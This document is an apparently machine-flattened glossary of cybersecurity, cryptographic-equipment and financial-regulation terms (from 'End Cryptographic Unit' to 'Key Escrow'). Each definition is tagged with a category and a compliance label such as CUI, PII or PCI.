End Cryptographic UnitnounDevice that (1) performs cryptographic functions, (2) typically is part of a larger system for which the device provides security services, and (3) from the viewpoint of a supporting security infrastructure (e.g., a key management system), is the lowest level of identifiable component with which a management transaction can be conducted.SystemRegulatedCUI
End-Item AccountingnounAccounting for all the accountable components of a COMSEC equipment configuration by a single short title.ProcessRegulatedCUI
End-to-end recoverabilitynounThe ability of an institution to recover a business process from initiation, such as customer contact, through process finalization, such as transaction closure.CapabilityRegulated
entry pointnounAn entry point is a memory address, corresponding to a point in the code of a computer program which is intended as destination of a long jump, be it internal or external.SystemRegulated
Error Detection CodenounA code computed from data and comprised of redundant bits of information designed to detect, but not correct, unintentional changes in the data.ControlRegulated
escrownounSomething (e.g., a document, an encryption key) that is "delivered to a third person to be given to the grantee only upon the fulfillment of a condition."ArtifactRegulated
Evaluation Assurance LevelnounSet of assurance requirements that represent a point on the Common Criteria predefined assurance scale.RequirementRegulated
event lognounA basic resource that helps provide information about network traffic, usage and other conditions. An event log stores these data for retrieval by security professionals or automated security systems to help network administrators manage various aspects such as security, performance and transparency.ArtifactRegulated
event loggingnounThe purpose of this task is to record the actions performed on a system.ArtifactRegulated
execution statusnounThe status of the implementation or enactment of a plan, order, or course of action.MetricRegulated
Executive AgencynounAn executive department specified in 5 United States Code (U.S.C.), Sec. 101; a military department specified in 5 U.S.C., Sec. 102; an independent establishment as defined in 5 U.S.C., Sec. 104(1); and a wholly owned government corporation fully subject to the provisions of 31 U.S.C., Chapter 91.OrganizationRegulatedCUI
Exercise KeynounCryptographic key material used exclusively to safeguard communications transmitted over-the-air during military or organized civil training exercises.CredentialRegulatedCUI
exposurenounThe potential loss to an area due to the occurrence of an adverse event.VulnerabilityRegulated
Exposure limitnounIn reference to the settlement of operating services, this is the maximum amount an ACH originator is allowed to originate. This amount can be based on the originator's credit rating, historical or predicted funding requirements, and the type of obligation.RequirementRegulated
external connectionnounA link between a system within the organizational boundaries and a secondary (or multiple) system(s) outside of the organizational boundaries.NetworkRegulated
external connectivitynounA computer or network connection to an outside, uncontrolled network that is unprotected by perimeter security, e.g., a modem connection to a network computer.NetworkRegulated
external information systemnounAn information system or component of an information system that is outside of the accreditation boundary established by the organization and for which the organization typically has no direct control over the application of required security controls or the assessment of security control effectiveness.SystemRegulated
External Information System or ComponentnounAn information system or component of an information system that is outside of the authorization boundary established by the organization and for which the organization typically has no direct control over the application of required security controls or the assessment of security control effectiveness.SystemRegulated
External Information System ServicenounAn information system service that is implemented outside of the authorization boundary of the organizational information system (i.e., a service that is used by, but not a part of, the organizational information system) and for which the organization typically has no direct control over the application of required security controls or the assessment of security control effectiveness.SystemRegulated
External Information System Service ProvidernounA provider of external information system services to an organization through a variety of consumer-producer relationships, including but not limited to: joint ventures; business partnerships; outsourcing arrangements (i.e., through contracts, interagency agreements, lines of business arrangements); licensing agreements; and/or supply chain exchanges.OrganizationRegulated
external requirementnounAny law, contractual obligation, code of connection, service level agreement, or even international agreement.RequirementRegulated
external routable connectivitynounThe ability to access a Bulk Electric System Cyber System from a Cyber Asset that is outside of its associated Electronic Security Perimeter via a bi-directional routable protocol connection.NetworkRegulated
external usernounIndividuals that are non-workforce members or personnel who are authorized by customers, entity management, or other authorized persons to interact with the system.IdentityRegulated
Extraction ResistancenounCapability of crypto-equipment or secure telecommunications equipment to resist efforts to extract key.ControlRegulated
Failure AccessnounType of incident in which unauthorized access to data results from hardware or software failure.EventRegulated
False AcceptancenounIn biometrics, the instance of a security system incorrectly verifying or identifying an unauthorized person. It typically is considered the most serious of biometric security errors as it gives unauthorized users access to systems that expressly are trying to keep them out.VulnerabilityRegulated
False RejectionnounIn biometrics, the instance of a security system failing to verify or identify an authorized person. It does not necessarily indicate a flaw in the biometric system; for example, in a fingerprint-based system, an incorrectly aligned finger on the scanner or dirt on the scanner can result in the scanner misreading the fingerprint, causing a false rejection of the authorized user.EventRegulated
Federal Bridge Certification AuthoritynounThe Federal Bridge Certification Authority consists of a collection of Public Key Infrastructure components (Certificate Authorities, Directories, Certificate Policies and Certificate Practice Statements) that are used to provide peer-to-peer interoperability among Agency Principal Certification Authorities.SystemRegulatedCUI
Federal Bridge Certification Authority MembranenounThe Federal Bridge Certification Authority Membrane consists of a collection of Public Key Infrastructure components including a variety of Certification Authority PKI products, Databases, CA specific Directories, Border Directory, Firewalls, Routers, Randomizers, etc.SystemRegulatedCUI
Federal Bridge Certification Authority Operational AuthoritynounThe Federal Bridge Certification Authority Operational Authority is the organization selected by the Federal Public Key Infrastructure Policy Authority to be responsible for operating the Federal Bridge Certification Authority.OrganizationRegulatedCUI
Federal Information Processing StandardnounA standard for adoption and use by federal departments and agencies that has been developed within the Information Technology Laboratory and published by the National Institute of Standards and Technology, a part of the U.S. Department of Commerce. A FIPS covers some topic in information technology in order to achieve a common level of quality or some level of interoperability.FrameworkRegulatedCUI
Federal Information Security Management ActnounA statute (Title III, P.L. 107-347) that requires agencies to assess risk to information systems and provide information security protections commensurate with the risk. FISMA also requires that agencies integrate information security into their capital planning and enterprise architecture processes, conduct annual information systems security reviews of all programs and systems, and report the results of those reviews to OMB.FrameworkRegulated
Federal Information SystemnounAn information system used or operated by an executive agency, by a contractor of an executive agency, or by another organization on behalf of an executive agency.SystemRegulatedCUI
Federal Reserve BanksnounThe Federal Reserve Banks provide a variety of financial services including retail and wholesale payments. The Federal Reserve Bank operates a nationwide system for clearing and settling checks drawn on depository institutions located in all regions of the United States.OrganizationRegulated
federal securities lawnounConsists of a handful of laws passed between 1933 and 1940, as well as legislation enacted in 1970. The federal laws stem from Congress's power to regulate interstate commerce. Therefore the laws are generally limited to transactions involving transportation or communication using interstate commerce or the mail.FrameworkRegulated
FedwirenounThe Federal Reserve Bank's nationwide real time gross settlement electronic funds and securities transfer network. Fedwire® is a credit transfer system. Each funds transfer is settled individually against an institution's reserve or clearing account on the books of the Federal Reserve. The transaction is considered an irrevocable payment as it is processed.NetworkRegulated
Fedwire Funds ServicenounThe Federal Reserve Banks' high-speed electronic funds transfer system. As a real-time gross settlement system, the Fedwire® Funds Service processes and settles individual payments between participants immediately in central bank money. Once processed, these payments are final.SystemRegulated
Fedwire Securities ServicenounThe Federal Reserve Banks' high-speed electronic payments system for maintaining securities accounts and for effecting securities transfers. The Fedwire® Securities Service provides a real-time, delivery-versus-payment (DVP), gross settlement system that allows for the immediate, simultaneous transfer of securities against payment. Once processed, securities transfers are final.SystemRegulated
Fill DevicenounCOMSEC item used to transfer or store key in electronic form or to insert key into cryptographic equipment.PhysicalRegulatedCUI
FIN (Financial Application)nounThe SWIFT application within which all SWIFT user-to-user messages are input and output.SystemRegulatedPCI
FinalitynounIrrevocable and unconditional transfer of payment during settlement.RequirementRegulatedPCI
Financial AuthoritynounA supervisory organization that is responsible for safeguarding and maintaining consumer confidence in the financial system.OrganizationRegulated
financial conditionnounThe status of a firm's assets, liabilities and equity positions at a specific point in time, often described in a financial statement.DataRegulated
Financial EDI (FEDI)nounFinancial electronic data interchange. An instrument for settling invoices by initiating payments, processing remittance data and automating reconciliation, through the exchange of electronic messages.DataRegulatedPII
Financial industry participantsnounFinancial institutions and other companies that are involved in the banking, securities, and/or insurance industry and are regulated by supervisory authorities.OrganizationRegulated
financial institutionnounAny bank licensed under the Banking Act (Cap. 19); any finance company licensed under the Finance Companies Act (Cap. 108); any person that is approved as a financial institution under section 28; any money-changer licensed to conduct money-changing business, or any remitter licensed to conduct remittance business, under the Money-changing and Remittance Businesses Act (Cap. 187); any insurer licensed or regulated under the Insurance Act (Cap. 142); any insurance intermediary registered or regulated under the Insurance Act; any licensed financial adviser under the Financial Advisers Act (Cap. 110); any approved holding company, securities exchange, futures exchange, recognised market operator, licensed trade repository, licensed foreign trade repository, approved clearing house, recognised clearing house or holder of a capital markets services licence under the Securities and Futures Act (Cap. 289); any trustee for a collective investment scheme authorised under section 286 of the Securities and Futures Act, that is approved under that Act; any trustee-manager of a business trust that is registered under the Business Trusts Act (Cap. 31A); any licensed trust company under the Trust Companies Act (Cap. 336); any holder of a stored value facility under the Payment Systems (Oversight) Act (Cap. 222A); any designated financial holding company under the Financial Holding Companies Act 2013 (Act 13 of 2013); any person licensed under the Banking Act (Cap. 19) to carry on the business of issuing credit cards or charge cards in Singapore; and any other person licensed, approved, registered or regulated by the Authority under any written law, but does not include such person or class of persons as the Authority may, by regulations made under this section, prescribe.OrganizationRegulated
financial market infrastructurenounA multilateral system among participating institutions, including the operator of the system, used for the purposes of clearing, settling or recording payments, securities, derivatives or other financial transactions.SystemRegulated
Financial Services Information Sharing and Analysis Center (FS-ISAC)nounA nonprofit, information-sharing forum established by financial services industry participants to facilitate the public and private sectors' sharing of physical and cybersecurity threat and vulnerability information.OrganizationRegulated
financial transactionnounAn event or agreement carried out between a buyer and a seller to exchange an asset for payment.EventRegulated
FIPS PUBnounAn acronym for Federal Information Processing Standards Publication. FIPS publications (PUB) are issued by NIST after approval by the Secretary of Commerce.FrameworkRegulatedCUI
FIPS-Approved Security MethodnounA security method (e.g., cryptographic algorithm, cryptographic key generation algorithm or key distribution technique, random number generator, authentication technique, or evaluation criteria) that is either a) specified in a FIPS, or b) adopted in a FIPS.ControlRegulatedCUI
FIPS-Validated CryptographynounA cryptographic module validated by the Cryptographic Module Validation Program (CMVP) to meet requirements specified in FIPS 140-2 (as amended). As a prerequisite to CMVP validation, the cryptographic module is required to employ a cryptographic algorithm implementation that has successfully passed validation testing by the Cryptographic Algorithm Validation Program (CAVP). See NSA-Approved Cryptography.ControlRegulated
Fixed COMSEC FacilitynounCOMSEC facility located in an immobile structure or aboard a ship.PhysicalRegulatedCUI
FloatnounFunds held by an institution during the check-clearing process before being made available to a depositor. Interest may be earned on these funds.DataRegulated
Forensic CopynounAn accurate bit-for-bit reproduction of the information contained on an electronic device or associated media, whose validity and integrity has been verified using an accepted algorithm.ArtifactRegulated
Forensic examinationnounThe process of collecting, assessing, classifying and documenting digital evidence to assist in the identification of an offender and the method of compromiseProcessRegulated
forensic investigationnounThe application of investigative and analytical techniques to gather and preserve evidence from a digital device impacted by a cyber attack.ProcessRegulated
forensic readinessnounThe ability of an FMI to maximise the use of digital evidence to identify the nature of a cyber attack.CapabilityRegulated
forensicsnounThe practice of gathering, retaining, and analyzing computer-related data for investigative purposes in a manner that maintains the integrity of the data.ProcessRegulated
Formal Access ApprovalnounA formalization of the security determination for authorizing access to a specific type of classified or sensitive information, based on specified access requirements, a determination of the individual’s security eligibility and a determination that the individual’s official duties require the individual be provided access to the information.ControlRegulatedCUI
Frequency HoppingnounRepeated switching of frequencies during radio transmission according to a specified algorithm, to minimize unauthorized interception or jamming of telecommunications.ControlRegulatedCUI
Full Disk EncryptionnounThe process of encrypting all the data on the hard disk drive used to boot a computer, including the computer’s operating system, and permitting access to the data only after successful authentication with the full disk encryption product.ControlRegulated
Full-interruption/full-scale test (IT and Staff)nounA business continuity test that activates all the components of the disaster recovery plan at the same time. Hardware, software, staff, communications, utilities, and alternate site processing should be thoroughly tested in this type of testing activity. The exercise should include the business line end users and the IT group to ensure that each business line tests its key applications and is prepared to recover and resume its business operations in the event of an emergency. The full test verifies that systems and staff can recover and resume business within established recovery time objectives. End users should verify the integrity of the data at the alternate site after the IT group has restored systems and applications needed for the staff to perform production activities.ProcessRegulated
funds transfer terminalnounAn information processing device used for the purpose of executing deposit account transactions between financial institutions and their customers by either the direct transmission of electronic impulses or the recording of electronic impulses for delayed processing.SystemRegulatedPCI
Global Information GridnounThe globally interconnected, end-to-end set of information capabilities for collecting, processing, storing, disseminating, and managing information on demand to warfighters, policy makers, and support personnel. The GIG includes owned and leased communications and computing systems and services, software (including applications), data, security services, other associated services, and National Security Systems. Non-GIG IT includes stand-alone, self-contained, or embedded IT that is not, and will not be, connected to the enterprise network.SystemRegulatedCUI
government bodynounThe government of any country or of any political subdivision of any country,including: any instrumentality of any such government; any other person or organization authorized by law to perform any executive, legislative, judicial, regulatory, administrative, military, or police functions of any such government, and; any intergovernmental organization.OrganizationRegulated
Government Emergency Telecommunications Service (GETS)nounAcronym for the Government Emergency Telecommunications Service card program. GETS cards provide emergency access and priority processing for voice communications services in emergency situations.CapabilityRegulatedCUI
Gramm-Leach-Bliley Act (GLBA)nounThe act, also known as the Financial Services Modernization Act of 1999, (Pub.L. 106-102, 113 Stat. 1338, enacted November 12, 1999), required the federal banking agencies to establish information security standards for financial institutions.FrameworkRegulatedPII
grant access to the systemnounThe purpose of this task is to permit a user to logically or physical gain entry to computer and/or network.ProcessRegulated
HaircutnounWith respect of an eligible currency, the percentage increase of a negative currency balance or reduction of a positive currency balance and is based on (a) the volatility of the historic foreign exchange movements in the applicable eligible currency determined by CLS Bank and (b) an add-on component.MetricRegulated
Hard Copy KeynounPhysical keying material, such as printed key lists, punched or printed key tapes, or programmable, read-only memories (PROM).PhysicalRegulatedCUI
hardware integritynounThe assurance that any given hardware asset is not a counterfeit, or otherwise falsely represented as being whole and intact as measured against original specifications.SystemRegulated
Hash-based Message Authentication CodenounA message authentication code that uses a cryptographic key in conjunction with a hash function.ControlRegulated
Health Information ExchangenounA health information organization that brings together healthcare stakeholders within a defined geographic area and governs health information exchange among them for the purpose of improving health and care in that community.OrganizationRegulatedPHI
High Assurance GuardnounA guard that has two basic functional capabilities: a Message Guard and a Directory Guard. The Message Guard provides filter service for message traffic traversing the Guard between adjacent security domains. The Directory Guard provides filter service for directory access and updates traversing the Guard between adjacent security domains.SystemRegulatedCUI
High ImpactnounThe loss of confidentiality, integrity, or availability that could be expected to have a severe or catastrophic adverse effect on organizational operations, organizational assets, individuals, other organizations, or the national security interests of the United States; (i.e., 1) causes a severe degradation in mission capability to an extent and duration that the organization is able to perform its primary functions, but the effectiveness of the functions is significantly reduced; 2) results in major damage to organizational assets; 3) results in major financial loss; or 4) results in severe or catastrophic harm to individuals involving loss of life or serious life threatening injuries).MetricRegulatedCUI
high impact Bulk Electric System Cyber SystemnounA Bulk Electric System Cyber System in which at least one security objective (i.e., confidentiality, integrity, or availability) is assigned a potential impact value of high.SystemRegulatedCUI
High-Impact SystemnounAn information system in which at least one security objective (i.e., confidentiality, integrity, or availability) is assigned a FIPS 199 potential impact value of high.SystemRegulatedCUI
HijackingnounThe use of an authenticated user's communication session to communicate with system components.ThreatRegulated
Homing beaconsnounDevices that send messages to the institution when they connect to a network and that enable recovery of the device.PhysicalRegulated
Hot SitenounBackup site that includes phone systems with the phone lines already connected. Networks will also be in place, with any necessary routers and switches plugged in and turned on. Desks will have desktop PCs installed and waiting, and server areas will be replete with the necessary hardware to support business-critical functions. Within a few hours, a hot site can become a fully functioning element of an organization.PhysicalRegulated
IA InfrastructurenounThe underlying security framework that lies beyond an enterprise’s defined boundary, but supports its IA and IA-enabled products, its security posture and its risk management plan.SystemRegulatedCUI
ICT supply chain threatnounA man-made threat achieved through exploitation of the information and communications technology (ICT) system’s supply chain, including acquisition processes.ThreatRegulated
Identification and AuthenticationnounThe purpose of this function is to verify the identity of an entity through the use of specific credentials as a prerequisite for granting access to resources in an IT system.CapabilityRegulated
identitynounThe set of attribute values (i.e., characteristics) by which an entity is recognizable and that, within the scope of an identity manager’s responsibility, is sufficient to distinguish that entity from any other entity.IdentityRegulatedPII
Identity BindingnounBinding of the vetted claimed identity to the individual (through biometrics) according to the issuing authority.ProcessRegulatedPII
identity managementnounThe purpose of this task is to implement a set of functions and capabilities used for assurance of identity information (e.g., identifiers, credentials, attributes).CapabilityRegulatedPII
Identity ProofingnounThe process by which a Credentials Service Provider (CSP) and a Registration Authority (RA) collect and verify information about a person for the purpose of issuing credentials to that person.ProcessRegulatedPII
Identity RegistrationnounThe process of making a person’s identity known to the Personal Identity Verification (PIV) system, associating a unique identifier with that identity, and collecting and recording the person’s relevant attributes into the system.ProcessRegulatedPII
Identity VerificationnounThe process of confirming or denying that a claimed identity is correct by comparing the credentials (something you know, something you have, something you are) of a person requesting access with those previously proven and stored in the PIV Card of system and associated with the identity being claimed.ProcessRegulatedCUI
ImagenounAn exact bit-stream copy of all electronic data on a device, performed in a manner that ensures that the information is not altered.ArtifactRegulated
Image archive (Check 21)nounDatabase for storage and easy retrieval of check images.DataRegulatedPII
Image capture (Check 21)nounThe process of digitizing both sides of physical items and their assorted MICR information as they are processed at the Federal Reserve Bank. Also includes storage of the images for up to 60 days.ProcessRegulatedPII
Image exchange (Check 21)nounExchange of some or all of the digitized images of a check.ProcessRegulatedPCI
Imitative Communications DeceptionnounIntroduction of deceptive messages or signals into an adversary's telecommunications signals. See also Communications Deception and Manipulative Communications Deception.ThreatRegulatedCUI
Impact LevelnounThe magnitude of harm that can be expected to result from the consequences of unauthorized disclosure of information, unauthorized modification of information, unauthorized destruction of information, or loss of information or information system availability.MetricRegulated
ImplantnounElectronic device or electronic equipment modification designed to gain unauthorized interception of information-bearing emanations.ThreatRegulatedCUI
in-house developed applicationnounAn application that has been developed within the organization.SystemRegulated
Inadvertent DisclosurenounType of incident involving accidental exposure of information to an individual not authorized access.EventRegulated
incident containment processnounAn established or official method for implementing the policy for incident containment or performing the tasks, processes, or operations to limit and prevent further damage from happening after an incident occurs, along with ensuring that there is no destruction of forensic evidence that may be needed for future legal actions which must be executed in the same manner in order to obtain the same results in the same circumstances.ProcessRegulated
Incident Management SystemnounThe tools (software and otherwise), reports, and processes used to input, process, and close incident reports from input through resolution.SystemRegulated
incident monitoring programnounThe documented activities, policies, and procedures within an organization for organizing and directing all activities undertaken to review, track, evaluate, and report on the status of incidents.ProcessRegulated
Incident ReportnounA record containing the details of an incident. Each incident record documents the lifecycle of a single incident.ArtifactRegulated
incident reportingnounThe purpose of this task is to use hotlines and emergency contacts to alert the appropriate individuals to the occurrence of a security event.ProcessRegulated
incident response activitynounAny task performed by an organization in reaction to an incident.ProcessRegulated
incident response notification processnounA series of steps undertaken to detect, triage, and resolve events that disrupt operations and alert applicable personnel and clients in conformance with pertinent standards.ProcessRegulated
incident response programnounA documented approach for organizing and directing all activities undertaken to handle known security breaches or attacks in such a way as to limit damage and reduce the time it takes for the organization to recover time and costs.ProcessRegulated
incomenounThe consumption and savings opportunity gained by an entity within a specified time frame, which is generally expressed in monetary terms.DataRegulated
incoming debit and credit totalnounThe total balance of all credit and debit postings that go into an account.MetricRegulated
Incomplete Parameter CheckingnounSystem flaw that exists when the operating system does not check all parameters fully for accuracy and consistency, thus making the system vulnerable to penetration.VulnerabilityRegulated
Indemnifying bank (Check 21)nounA financial institution that transfers, presents, or returns a substitute check or a paper or electronic representation of a substitute check for which it receives consideration. The financial institution shall indemnify the recipient and any subsequent recipient (including a collecting or returning financial institution, the depository financial institution, the drawer, the drawee, the payee, the depositor, and any endorser) for any loss incurred by any recipient of a substitute check if that loss occurred due to the receipt of a substitute check instead of the original.OrganizationRegulated
independence standardsnounThe ability, without the service of others, or with a reduced level of the services of others, to function within the community.RequirementRegulated
Independent sales organizationnounA non-financial institution organization that provides a variety of merchant processing functions on behalf of the acquirer. These functions include soliciting new merchant accounts, arranging for terminal purchases or leases, and providing backroom services. An Independent sales organization is also referred to as a member service provider (MSP). The acquirer must register all Independent sales organization/MSPs with the bankcard associations.OrganizationRegulatedPCI
Independent Validation AuthoritynounEntity that reviews the soundness of independent tests and system compliance with all stated security controls and risk mitigation actions. IVAs will be designated by the Authorizing Official as needed.OrganizationRegulatedCUI
individualnounA citizen of the United States or an alien lawfully admitted for permanent residence. Agencies may, consistent with individual practice, choose to extend the protections of the Privacy Act and E-Government Act to businesses, sole proprietors, aliens, etc.IdentityRegulatedPII
Individual AccountabilitynounAbility to associate positively the identity of a user with the time, method, and degree of access to an information system.RequirementRegulated
Industrial Control SystnounAn information system used to control industrial processes such as manufacturing, product handling, production, and distribution or to control infrastructure assets.SystemRegulatedCUI
Industrial Control SystemnounAn information system used to control industrial processes such as manufacturing, product handling, production, and distribution. Industrial control systems include supervisory control and data acquisition systems (SCADA) used to control geographically dispersed assets, as well as distributed control systems (DCS) and smaller control systems using programmable logic controllers to control localized processes.SystemRegulatedCUI
information and communication(s) technologynounAny information technology, equipment, or interconnected system or subsystem of equipment that processes, transmits, receives, or interchanges data or information.SystemRegulated
Information Assurance CompliancnounIn the NICE Workforce Framework, cybersecurity work where a person: Oversees, evaluates, and supports the documentation, validation, and accreditation processes necessary to assure that new IT systems meet the organization's information assurance and security requirements; ensures appropriate treatment of risk, compliance, and assurance from internal and external perspectives.CapabilityRegulated
Information Assurance ComponentnounAn application (hardware and/or software) that provides one or more Information Assurance capabilities in support of the overall security and operational objectives of a system.CapabilityRegulatedCUI
Information Assurance Vulnerability AlertnounNotification that is generated when an Information Assurance vulnerability may result in an immediate and potentially severe threat to DoD systems and information; this alert requires corrective action because of the severity of the vulnerability risk.VulnerabilityRegulatedCDI
Information Flow ControlnounProcedure to ensure that information transfers within an information system are not made in violation of the security policy.ControlRegulatedCUI
information neednounInsight necessary to manage objectives, goals, risks and problems.RequirementRegulated
Information OperationsnounThe integrated employment of the core capabilities of electronic warfare, computer network operations, psychological operations, military deception, and operations security, in concert with specified supporting and related capabilities, to influence, disrupt, corrupt, or usurp adversarial human and automated decision-making process, information, and information systems while protecting our own.CapabilityRegulatedCUI
Information ResourcesnounInformation and related resources, such as personnel, equipment, funds, and information technology.DataRegulated
Information Security Continuous Monitoring ProcessnounA process to: • Define an ISCM strategy; • Establish an ISCM program; • Implement an ISCM program; • Analyze data and Report findings; • Respond to findings; and • Review and Update the ISCM strategy and program.ProcessRegulated
Information Security Continuous Monitoring ProgramnounA program established to collect information in accordance with pre-established metrics, utilizing information readily available in part through implemented security controls.ProcessRegulated
information security eventnounIdentified occurrence of a system, service or network state indicating a possible breach of information security policy or failure of controls, or a previously unknown situation that may be security relevant.EventRegulated
information security incidentnounA single or a series of unwanted or unexpected information security events that have a significant probability of compromising business operations and threatening information security.EventRegulated
Information Security risknounThe risk to organizational operations (including mission, functions, image, reputation), organizational assets, individuals, other organizations, and the Nation due to the potential for unauthorized access, use, disclosure, disruption, modification, or destruction of information and/or information systems. See Risk.MetricRegulatedCUI
information security threatnounAny circumstance or event with the potential to adversely impact the measures taken so that information and information systems are protected from unauthorized access, use, disclosure, disruption, modification, or destruction.ThreatRegulated
Information Sharing Environmentnoun1. An approach that facilitates the sharing of terrorism and homeland security information; or 2. ISE in its broader application enables those in a trusted partnership to share, discover, and access controlled information.SystemRegulatedCUI
Information StewardnounIndividual or group that helps to ensure the careful and responsible management of federal information belonging to the Nation as a whole, regardless of the entity or source that may have originated, created, or compiled the information. Information stewards provide maximum access to federal information to elements of the federal government and its customers, balanced by the obligation to protect the information in accordance with the provisions of FISMA and any associated security-related federal policies, directives, regulations, standards, and guidance.RoleRegulated
Information SystemnounA discrete set of information resources organized for the collection, processing, maintenance, use, sharing, dissemination, or disposition of information. [Note: Information systems also include specialized systems such as industrial/process controls systems, telephone switching and private branch exchange (PBX) systems, and environmental control systems.]SystemRegulated
information system componentnounA discrete, identifiable information technology asset (e.g., hardware, software, firmware) that represents a building block of an information system. Information system components include commercial information technology products.SystemRegulated
Information System Contingency PlannounManagement policy and procedures designed to maintain or restore business operations, including computer operations, possibly at an alternate location, in the event of emergencies, system failures, or disasters.ProcessRegulatedCUI
Information System-Related Security RisksnounInformation system-related security risks are those risks that arise through the loss of confidentiality, integrity, or availability of information or information systems and consider impacts to the organization (including assets, mission, functions, image, or reputation), individuals, other organizations, and the Nation.ThreatRegulated
Information Systems SecuritynounProtection of information systems against unauthorized access to or modification of information, whether in storage, processing, or transit, and against the denial of service to authorized users, including those measures necessary to detect, document, and counter such threats.CapabilityRegulated
Information Systems Security Equipment ModificationnounModification of any fielded hardware, firmware, software, or portion thereof, under NSA configuration control. There are three classes of modifications: mandatory (to include human safety); optional/special mission modifications; and repair actions. These classes apply to elements, subassemblies, equipment, systems, and software packages performing functions such as key generation, key distribution, message encryption, decryption, authentication, or those mechanisms necessary to satisfy security policy, labeling, identification, or accountability.ProcessRegulatedCUI
information technologynounAny equipment or interconnected system or subsystem of equipment that is used in the automatic acquisition, storage, manipulation, management, movement, control, display, switching, interchange, transmission, or reception of data or information by the executive agency. For purposes of the preceding sentence, equipment is used by an executive agency if the equipment is used by the executive agency directly or is used by a contractor under a contract with the executive agency which— 1) requires the use of such equipment; or 2) requires the use, to a significant extent, of such equipment in the performance of a service or the furnishing of a product. The term information technology includes computers, ancillary equipment, software, firmware and similar procedures, services (including support services), and related resources.SystemRegulated
Information Technology auditnounAn examination of the controls within an Information technology (IT) infrastructure.ProcessRegulated
Information Technology controlnounRefers to the internal controls over security management, system development and change management, information processing, communications networks and management of technology service providers.ControlRegulated
Information Technology systemnounInformation technology systems are collectively the equipment used to create, store and transmit digital data and any related software owned (or otherwise controlled) and used by the State and its agencies to fulfill its service and obligations to the citizens of Arizona.SystemRegulated
Information TypenounA specific category of information (e.g., privacy, medical, proprietary, financial, investigative, contractor sensitive, security management), defined by an organization or in some instances, by a specific law, Executive Order, directive, policy, or regulation.RequirementRegulated
InsidenounAn entity with authorized access (i.e., within the security domain) that has the potential to harm an information system or enterprise through destruction, disclosure, modification of data, and/or denial of service.ThreatRegulated
Inspectable SpacenounThree dimensional space surrounding equipment that processes classified and/or sensitive information within which TEMPEST exploitation is not considered practical or where legal authority to identify and remove a potential TEMPEST exploitation exists. Synonymous with zone of control.PhysicalRegulatedCUI
InstructionnounMeans (i) any instruction submitted by a Member through the submission process directing CLS Bank to settle certain payment entitlements and obligations arising pursuant to an FX transaction eligible for settlement in CLS Bank and (ii) any instructions resulting from the split of Settlement Eligible Instructions.RequirementRegulated
insurance coveragenounThe amount of risk or liability covered for an individual or entity by way of insurance services. Insurance coverage is issued by an insurer in the event of an unforeseen or unwanted occurrences.RequirementRegulated
insurance ridernounAn add-on provision to a basic insurance policy that provides additional benefits to the policyholder at an additional cost. Standard policies usually leave little room for modification or customization beyond choosing deductibles and coverage amounts.RequirementRegulated
interactive remote accessnounUser-initiated access by a person employing a remote access client or other remote access technology using a routable protocol. Remote access originates from a Cyber Asset that is not an Intermediate System and not located within any of the Responsible Entity’s Electronic Security Perimeter(s) or at a defined Electronic Access Point (EAP). Remote access may be initiated from: 1) Cyber Assets used or owned by the Responsible Entity, 2) Cyber Assets used or owned by employees, and 3) Cyber Assets used or owned by vendors, contractors, or consultants. Interactive remote access does not include system-to-system process communications.ProcessRegulatedCUI
interactive user accessnounUser access to an operating system by means of a log-in through a Graphical User Interface.ProcessRegulated
Interbank checksnounChecks that are not "on-us." They are cleared and settled either by direct presentment, a clearinghouse association, a correspondent bank, or a Federal Reserve Bank.DataRegulated
InterchangenounExchange of transactions between financial institutions participating in a bank card network, based on a common set of rules. Card interchange allows a financial institution's customers to use a bank credit card at any card honoring merchant and to gain access to multiple ATM systems from a single ATM.ProcessRegulatedPCI
Interchange feesnounFees paid by one financial institution to another to cover handling costs and credit risk in a financial institution card transaction. Interchange fees generally flow toward the institution funding the transaction and assuming the risk. In a credit card transaction, the interchange fee is paid by the merchant acquirer accepting the merchant's sales draft to the card-issuing institution, which, in turn, passes the fee to its merchants. In EFT/POS transactions, interchange flows in the opposite direction: the card-issuing institution (or customer) pays the fee to the terminal-owning institution. When a transaction is an off-line debit sale, the card-issuing institution collects an interchange fee from the merchant, rather than from the customer, unlike in an EFT/POS transaction, where the customer pays the interchange fee. Interchange revenue is derived from fees set by the card associations. Depending on the card association, fees can range from 1% to 3% of the value of the transaction. Interchange revenue is recognized as a card issuer's second largest revenue line item.RequirementRegulated
Interconnection Security AgreementnounA document that regulates security-relevant aspects of an intended connection between an agency and an external system. It regulates the security interface between any two systems operating under two different distinct authorities. It includes a variety of descriptive, technical, procedural, and planning information. It is usually preceded by a formal MOA/MOU that defines high-level roles and responsibilities in management of a cross-domain connection.RequirementRegulatedCUI
interconnectivitynounThe state or quality of being connected together. The interaction of a financial institution's internal and external systems and applications and the entities with which they are linked.NetworkRegulated
Interface Control DocumentnounTechnical document describing interface controls and identifying the authorities and responsibilities for ensuring the operation of such controls. This document is baselined during the preliminary design review and is maintained throughout the information system life cycle.ArtifactRegulatedCUI
Interim Approval to OperatenounTemporary authorization granted by a DAA for an information system to process information based on preliminary results of a security evaluation of the system. (To be replaced by ATO and POA&M)ArtifactRegulatedCUI
Interim Approval to TestnounTemporary authorization to test an information system in a specified operational information environment within the time frame and under the conditions or constraints enumerated in the written authorization.RequirementRegulatedCUI
Intermediate Certification AuthoritynounA Certification Authority that is subordinate to another CA, and has a CA subordinate to itself.SystemRegulated
intermediate systemnounA Cyber Asset or collection of Cyber Assets performing access control to restrict Interactive Remote Access to only authorized users. The Intermediate System must not be located inside the Electronic Security Perimeter.SystemRegulatedCUI
internal controlnounThe purpose of this task is to provide reasonable assurance that operations are effective and efficient, financial reporting is reliable, and applicable laws and regulations are being followed.ControlRegulated
InterrogationnounUsed to obtain prior indicators or relationships, including telephone numbers, IP addresses and names of individuals, from extracted dataProcessRegulatedPII
investigationnounThe purpose of this task is to discover and examine the facts of an incident or allegation to establish the truth.ProcessRegulated
IT Security Awareness and Training ProgramnounExplains proper rules of behavior for the use of agency information systems and information. The program communicates IT security policies and procedures that need to be followed (i.e., NSTISSD 501, NIST SP 800-50).ProcessRegulatedCUI
JitternounJitter or Noise is the modification of fields in a database while preserving the aggregate characteristics of that make the database useful in the first place.ControlRegulatedPII
key controlnounA type of internal control designed to detect errors or fraud in financial statements.ControlRegulated
Key Distribution CenternounCOMSEC facility generating and distributing key in electronic form.SystemRegulatedCUI
Key Escrownoun1. The processes of managing (e.g., generating, storing, transferring, auditing) the two components of a cryptographic key by two key component holders. 2. A key recovery technique for storing knowledge of a cryptographic key, or parts thereof, in the custody of one or more third parties called "escrow agents," so that the key can be recovered and used in specified circumstances.ProcessRegulatedCUI
